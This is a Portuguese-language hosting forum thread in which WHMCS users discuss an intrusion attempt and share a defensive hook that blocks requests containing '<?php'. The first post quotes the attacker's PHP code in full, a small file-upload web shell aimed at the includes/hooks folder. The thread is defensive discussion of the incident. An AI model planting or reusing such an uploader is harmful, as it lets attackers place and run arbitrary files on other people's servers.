lucasippon Postado Fevereiro 1, 2012 Postado Fevereiro 1, 2012 Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/ <?php echo '<form action=" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } ?> ) Será que corro algum risco? Estou usando a versão 5.03 do WHMCS Valeu! Não sei se a versão 5 ja vem com o patch de segurança instalado, porém se você ja instalou o patch de segurança anteriormente não corre nenhum risco, pelo menos são que eles alegam.
edvan Postado Fevereiro 3, 2012 Postado Fevereiro 3, 2012 Re Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/ '; echo ' '; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!! '; } else { echo 'Upload GAGAL !!! '; } } ?> ) Será que corro algum risco? Estou usando a versão 5.03 do WHMCS Valeu! Realmente não tem problema conforme o @lucasippon informou! Se quiser bloquear essas tentativas duplique o hooks e na linha 4 altere para if (strpos($_REQUEST[$checkvar],'<?php')!==false) {
GrandeHost Postado Fevereiro 3, 2012 Postado Fevereiro 3, 2012 Ja aconteceu comigo isso em janeiro agora tb.
Helcio Postado Fevereiro 3, 2012 Postado Fevereiro 3, 2012 Esse script do TIU Edvan é porreta mesmo! Depois de colocar ele na pasta não tive mais problemas. E agora vive aparecendo uns ip's banidos na lista, tem até comédinha BR no meio!!!!!! Valeu Edvan.
Lperez Postado Fevereiro 3, 2012 Postado Fevereiro 3, 2012 Re Realmente não tem problema conforme o @lucasippon informou! Se quiser bloquear essas tentativas duplique o hooks e na linha 4 altere para if (strpos($_REQUEST[$checkvar],' Obrigado Edvan!
edvan Postado Fevereiro 3, 2012 Postado Fevereiro 3, 2012 Esse script do TIU Edvan é porreta mesmo! Depois de colocar ele na pasta não tive mais problemas. E agora vive aparecendo uns ip's banidos na lista, tem até comédinha BR no meio!!!!!! Valeu Edvan. Obrigado Edvan! Na verdade o script não é meu... Foi publicado em http://www.portaldohost.com.br/whmcs/onda-de-ataques-ao-whmcs-o-que-fazer sendo que o original é do http://www.webhostingtalk.com/showpost.php?p=7856656&postcount=68 Eu apenas dei uma incrementada ( bloqueio de IP + notificação/registro ).
garuva Postado Fevereiro 9, 2012 Postado Fevereiro 9, 2012 Estou pensando seriamente em abandonar o WHMCS, embora sei que este esta entre os melhores senão o melhor gerenciador de host, mas infelizmente sua segurança é pífia. Notório que a empresa do WHMCS esta deixando a desejar, pois é inadmissível esta quantidade de problemas que esta ocorrendo em um produto que pagamos para funcionar corretamente. Espero que não me levem a mal, pois como disse o WHMCS é excelente no quesito funcionalidade entretanto a partir do momento que temos que mudar pastas, mexer em códigos contratar módulos de segurança separados me parece descaso os usuários já que se isso resolve o problema, porque não tem uma versão com estas soluções.
Posts Recomendados